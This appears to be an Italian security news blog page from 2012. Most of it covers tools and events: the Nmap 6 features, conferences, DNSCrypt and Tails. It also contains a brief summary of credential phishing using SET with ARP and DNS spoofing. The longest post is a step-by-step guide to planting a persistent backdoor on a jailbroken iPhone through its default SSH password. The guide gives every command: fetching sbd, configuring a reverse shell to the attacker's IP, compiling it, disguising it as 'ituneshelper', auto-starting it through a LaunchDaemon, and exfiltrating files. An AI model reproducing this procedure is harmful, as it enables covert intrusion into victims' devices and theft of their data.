Nmap, il famoso software di port scanning open source e gratuito, si è recentemente aggiornato alla versione 6 introducendo le seguenti migliorie:

  • NSE Enhanced – The Nmap Scripting Engine (NSE) has exploded in popularity and capabilities. This modular system allows users to automate a wide variety of networking tasks, from querying network applications for configuration information to vulnerability detection and advanced host discovery. The script count has grown from 59 in Nmap 5 to 348 in Nmap 6, and all of them are documented and categorized in our NSE Documentation Portal. The underlying NSE infrastructure has improved dramatically as well.
  • Better Web Scanning – As the Internet has grown more web-centric, Nmap has developed web scanning capabilities to keep pace. When Nmap was first released in 1997, most of the network services offered by a server listened on individual TCP or UDP ports and could be found with a simple port scan. Now, applications are just as commonly accessed via URL path instead, all sharing a web server listening on a single port. Nmap now includes many techniques for enumerating those applications, as well as performing a wide variety of other HTTP tasks, from web site spidering to brute force authentication cracking. Technologies such as SSL encryption, HTTP pipelining, and caching mechanisms are well supported.
  • Full IPv6 Support – Given the exhaustion of available IPv4 addresses, the Internet community is trying to move to IPv6. Nmap has been a leader in the transition, offering basic IPv6 support since 2002. But basic support isn’t enough, so we spent many months ensuring that Nmap version 6 contains full support for IP version 6. And we released it just in time for the World IPv6 Launch. We’ve created a new IPv6 OS detection system, advanced host discovery, raw-packet IPv6 port scanning, and many NSE scripts for IPv6-related protocols. It’s easy to use too—just specify the -6 argument along with IPv6 target IP addresses or DNS records. In addition, all of our web sites are now accessible via IPv6. For example, Nmap.org can be found at 2600:3c01::f03c:91ff:fe96:967c.
  • New Nping Tool – The newest member of the Nmap suite of networking and security tools is Nping, an open source tool for network packet generation, response analysis and response time measurement. Nping can generate network packets for a wide range of protocols, allowing full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts, it can also be used as a raw packet generator for network stack stress testing, ARP poisoning, Denial of Service attacks, route tracing, etc. Nping’s novel echo mode lets users see how packets change in transit between the source and destination hosts. That’s a great way to understand firewall rules, detect packet corruption, and more.
  • Better Zenmap GUI results viewer – While Nmap started out as a command-line tool and many (possibly most) users still use it that way, we’ve also developed an enhanced GUI and results viewer named Zenmap. One addition since Nmap 5 is a “filter hosts” feature which allows you to see only the hosts which match your criteria (e.g. Linux boxes, hosts running Apache, etc.) We’ve also localized the GUI to support five languages besides English. A new script selection interface helps you find and execute Nmap NSE scripts. It even tells you what arguments each script supports.
  • Faster scans – In Nmap’s 15-year history, performance has always been a top priority. Whether scanning one target or a million, users want scans to run as fast as possible without sacrificing accuracy. Since Nmap 5 we’ve rewritten the traceroute system for higher performance and increased the allowed parallelism of the Nmap Scripting Engine and version detection subsystems. We also performed an intense memory audit which reduced peak consumption during our benchmark scan by 90%. We made many improvements to Zenmap data structures and algorithms as well so that it can now handle large enterprise scans with ease.

Potete scaricare l’ultima versione direttamente dal sito internet ufficiale.

 

Via | DarkNet

 

 

Si svolgerà il 6 e 7 giugno presso SGM Conference Center l’edizione romana del Security Summit, la manifestazione dedicata alla sicurezza delle informazioni, delle reti e dei sistemi informatici, promossa da Clusit, la principale associazione italiana del settore, e CEventi. Due giorni densi di seminari, atelier tecnologici, tavole rotonde per affrontare i temi di più stretta attualità della Information Security con relatori di primo piano: docenti universitari, consulenti e uomini di impresa.

La giornata di apertura del convegno, mercoledì 6 giugno, prevede una Tavola Rotonda dal titolo « La sicurezza ICT e le proposte per l’Agenda Digitale e l’innovazione in Italia ». Il tema sarà quello della sicurezza ICT in Italia partendo dal Rapporto Clusit 2012, il primo di una serie di rapporti annuali prodotto da Clusit e Security Summit sulla situazione della sicurezza ICT nel nostro Paese. Rispetto all’edizione presentata a marzo in occasione del Security Summit di Milano, il testo su cui verterà la tavola rotonda di Roma è stato aggiornato con gli eventi di cybercrime e incidenti informatici più significativi dei primi 4 mesi del 2012.

La Tavola Rotonda, moderata da Gigi Tagliapietra, presidente Clusit, analizzerà anche le iniziative dell’Agenda Digitale proposte in Cabina di Regia all’attenzione del Ministro Passera e del Governo Monti e più in generale le priorità per 2012 e 2013. Saranno presenti: Antonio Apruzzese, Direttore Polizia Postale e delle Comunicazioni; Domenico Casalino, Amm. Del. Consip SpA (Ministero dell’Economia e delle Finanze – MEF); Paolo Campobasso, Senior Vice President and Group Chief Security Officer Finmeccanica; Gastone Nencini, Senior Technical Manager Trend Micro; Giovanni Todaro, IBM Security Systems Leader e Alessandro Vallega, Oracle Security Business Development Manager e Responsabile di Oracle Community for Security.

Come di consueto, l’appuntamento prevede momenti di approfondimento di elevata qualità e occasioni di aggiornamento professionale su tecnologie e soluzioni attraverso atelier tecnologici, sessioni formative e percorsi professionali. Numerose le tematiche affrontate: Agenda Digitale, Mobile Security, Cybercrime, Cloud Security, Social Media Security, Security Intelligence e Cloud, DNS Security, Rete satellitare e sicurezza, Controllo degli accessi tramite smartphone e codici a barre bidimensionali, Nuove regole tecniche per la PA, Recenti normative e nuove regole per il trattamento dei dati personali, Privacy nel Cloud e Privacy nel Mobile, Computer Forensic, Sicurezza delle Infrastrutture Critiche.

Al termine della prima giornata, si terrà l’Hacking Film Festival, rassegna dedicata a lungometraggi e filmati indipendenti sul tema dell’hacking e della (in)sicurezza, commentati e analizzati da esperti del settore.

Tutti gli appuntamenti del Security Summit sono a partecipazione gratuita previa registrazione sul sito www.securitysummit.it

Il nostro lettore Fenrir ha recentemente aperto un suo blog, CrittoScala, con l’obbiettivo di discutere sull’algoritmo crittografico ideato da Giuseppe Scala con chi si stia eventualmente occupando della sua crittanalisi a seguito della sfida lanciata lo scorso Aprile 2012.

Chiunque fosse interessato a seguire più da vicino le fasi della sfida o per chi volesse collaborare può accedere al blog CrittoScala,

L’autore del Blog ci tiene a sottolineare che saranno ben accetti tutti i commenti, anche quelli critici, e spera che qualcuno più preparato di lui possa intervenire nelle discussioni. Infine vuole sottolineare quanto ritiene assurdo, ma soprattutto pericoloso, premiare “ufficialmente” un algoritmo crittografico segreto (non ancora pubblicato) e ancora in fase di studio, e pubblicizzarlo come una futura alternativa ad AES.

 

 

DNSCrypt il programma per cifrare tutte le nostre comunicazioni con i server DNS è ora disponibile anche per Windows, arriverà a breve anche la versione per Linux!

DNSCrypt permette di risolvere le vulnerabilità legate alle comunicazioni DNS, come la vulnerabilità Kamisky del 2008, proteggendo l’ultimo miglio della connessione ad internet dell’utente, ovvero le comunicazioni tra ISP e Utente.

In passato ci sono stati numerosi esempi di manomissione, o man-in-the-middle, e snooping del traffico DNS nell’ultimo miglio rappresentando un serio rischio di sicurezza informatica. Oggi possiamo risolverli attraverso DNSCrypt.

È possibile scaricare il software, attualmente in fase beta, sul sito internet ufficiale.

È iniziata da pochissimi minuti la Cracca al Tesoro 2012 che si terrà  alla fiera di Genova, potete seguire l’evento su Twitter attraverso l’hastag #catge2012!

Il programma della giornata è il seguente:

MATTINA

9.30 Paolo Giardini, Alessio Pennasilico: saluti e presentazione ospiti

10.00 Avv. Pierluigi Perri, Università di Milano:  le norme e gli hacker, proposta europea sugli strumenti per testare la sicurezza

10.15Roberto Surlinelli,  Dirigente Capo Polizia Postale:  La polizia Postale ed il contrasto alla criminalità informatica

10.30 tavola rotonda con hacker etici, professionisti della sicurezza informatica, legali, forze di polizia  ed esperti del settore sul tema del contrasto ai crimini informatici.

11.30 Spazio Tooway

1.45 Spazio Fly Communications

12.00 CAT Story. Come funziona, consigli, regolamento (Cristiano Cafferata, Alessio Pennasilico, Paolo Giardini, Raoul Chiesa)

ore 12.30 Q&A

ore 13.00 pausa pranzo

 

POMERIGGIO

Ore 14.00 briefing

ore 14.30 via al gioco Cracca Al Tesoro

ore 15.00 via al gioco Running Man

ore 18.30 stop giochi

ore 19.00 premiazione

ore 20.00 aperitivo offerto dagli sponsor

Buona Giornata!

Il blog Security Obscurity ha recentemente pubblicato un interessante video in cui mostra come un utente malintenzionato può recuperare le credenziale degli utenti che tentano di loggarsi in una piattaforma WEB in un ambiente LAN.

Per sferrare l’attacco viene usato l’applicativo SET simulando il recupero delle credenziali di accesso di un utente che tenta di collegarsi al noto Social Network Facebook, SET avrà il compito di clonare l’attuale homepage di Facebook e configurare un server in ascolto sulla porta 80 con il portale clonato.

Successivamente con un Arp-Scan vengono identificate le potenziali vittime nella rete e sfruttando Net Command di Evilsocket si esegue un Arp Spoofing per reindirizzare il traffico attraverso l’attaccante.

Infine si effettua un DNS Spoofing  così tutte le richieste inviate dalla vittima verranno reindirizzate all’attaccante, compresi i dati di login.

Per tutti i dettagli e le procedure potete consultare i video di apertura.

Marsilio Editori, in collaborazione con il Festival Internazionale del Giornalismo di Perugia (25-29 aprile 2012), distribuisce gratuitamente Il giornalista Hacker. Piccola guida per un uso sicuro e consapevole della tecnologia di Giovanni Ziccardi, un agile volumetto in cui l’autore descrive e spiega alcuni trucchi da hacker che possono rivelarsi di grande utilità per chi esercita oggi una professione delicata e costantemente a rischio per quanto riguarda la sicurezza informatica come quella del giornalista. La guida può essere utile anche ad avvocati, blogger, attivisti ecc.

«Di certo, il senso delle regole elementari che seguono non è quello di voler far diventare chiunque “hacker in un’ora”» scrive Ziccardi nella prefazione che è possibile leggere interamente sul sito del Festival. «Il percorso verso l’hacking è lungo, tormentato, fatto di tante prove e curiosità, di tentativi, di errori. Però è pur vero che tutti possono essere un po’ hacker nella vita quotidiana, ossia possono cercare di superare quel velo di normalità cui le tecnologie di oggi ci abituano e spingersi, anche solo per curiosità, verso strumenti che possano portare benefici immediati anche nella vita informatica di tutti i giorni e, soprattutto, nelle professioni più delicate.»

Potete scaricare l’eBook Gratuito cliccando qui in formato PDF oppure è disponibile in formato epub in tutti gli store che distribuiscono gli ebook Marsilio per esempio Amazon Kindle Store.

Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.

Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.

Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

Scarichiamo ed estraiamo la Backdoor

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h

Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

Compiliamo SBD

<pre>iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
EOF

iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

[email protected]:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

[email protected]:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e  
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

[email protected]:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

Se per esempio vogliamo trasferire un file dal dispositivo

[email protected]:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file

iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

Infine vi riportiamo la procedura per disinstallare la Backdoor

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper

Tails e’ una distribuzione Debian live in cui tutto in traffico di rete viene rediretto attraverso Tor, e che contiene i principali applicativi per la privacy in Rete già correttamente installati. È distribuita come immagine iso ibrida, che puo’ essere avviata in modalità Live USB o Live CD attraverso la ISO distribuita gratuitamente dagli sviluppatori.

Tails permette di utilizzare Internet in forma anonima quasi ovunque si vada e su qualsiasi computer poichè tutte le connessioni generate saranno inoltrare alla rete Tor, essendo una distribuzione Live potrai eliminare tutte le tracce dal PC in uso ed inoltre contiene i principali tools per crittografare le tue eMail, messaggi istantanei o file.

E’ stata rilasciata recentemente la versione 0.11 con notevoli cambiamenti, trovate il Change Log dopo il salto, per chi fosse interessato all’applicazione può trovare maggiori dettagli e i link per il download sul sito ufficiale.

Continua a leggere